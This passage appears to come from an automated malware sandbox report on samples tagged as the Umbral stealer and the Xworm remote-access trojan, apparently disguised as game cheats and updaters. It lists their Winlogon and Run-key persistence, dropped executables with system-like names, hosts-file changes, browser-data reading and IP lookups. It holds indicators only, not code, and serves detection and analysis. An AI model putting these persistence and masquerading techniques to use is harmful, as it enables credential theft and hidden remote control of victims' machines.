Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\", \"C:\\hostNet\\sppsvc.exe\", \"C:\\hostNet\\RustCheat.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\", \"C:\\hostNet\\sppsvc.exe\", \"C:\\hostNet\\RustCheat.exe\", \"C:\\Users\\Public\\fontdrvhost.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\", \"C:\\hostNet\\sppsvc.exe\", \"C:\\hostNet\\RustCheat.exe\", \"C:\\Users\\Public\\fontdrvhost.exe\", \"C:\\Windows\\Branding\\Basebrd\\it-IT\\wininit.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\", \"C:\\hostNet\\sppsvc.exe\", \"C:\\hostNet\\RustCheat.exe\", \"C:\\Users\\Public\\fontdrvhost.exe\", \"C:\\Windows\\Branding\\Basebrd\\it-IT\\wininit.exe\", \"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Umbral

stealer umbral

Xworm

trojan rat xworm

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\RuntimeBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\hostNet\\sppsvc.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RustCheat = "\"C:\\hostNet\\RustCheat.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\Public\\fontdrvhost.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Windows\\Branding\\Basebrd\\it-IT\\wininit.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RustCheat = "\"C:\\hostNet\\RustCheat.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\Public\\fontdrvhost.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe" C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\hostNet\\sppsvc.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Windows\\Branding\\Basebrd\\it-IT\\wininit.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\hostNet\\RuntimeBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\hostNet\\RuntimeBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created \??\c:\Windows\System32\fruvan.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\CSCE5B170DA89404678AA3867794C8F9A19.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Branding\Basebrd\it-IT\wininit.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File opened for modification C:\Windows\Branding\Basebrd\it-IT\wininit.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Windows\Branding\Basebrd\it-IT\56085415360792 C:\hostNet\bridgeblockportComBroker.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
